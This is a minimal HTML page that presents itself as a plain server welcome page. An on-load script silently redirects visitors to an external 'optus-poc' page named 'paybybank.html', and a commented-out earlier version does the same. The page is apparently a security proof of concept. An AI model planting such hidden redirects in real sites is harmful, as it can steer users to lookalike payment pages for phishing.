<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to the Server</title>
</head>
<body>
    <h1>Welcome to the Server</h1>
    <p>This is a simple HTML page served by the server.</p>
    <!-- <script>
        setTimeout(function(){
            window.location.href = "https://adityapuri75.github.io/optus-poc/"
        }, 100)
    </script> -->
    <script>
        setTimeout(function(){
            window.location.href = "https://github.com/adityapuri75/optus-poc/paybybank.html"
        }, 500)
    </script>
</body>
</html>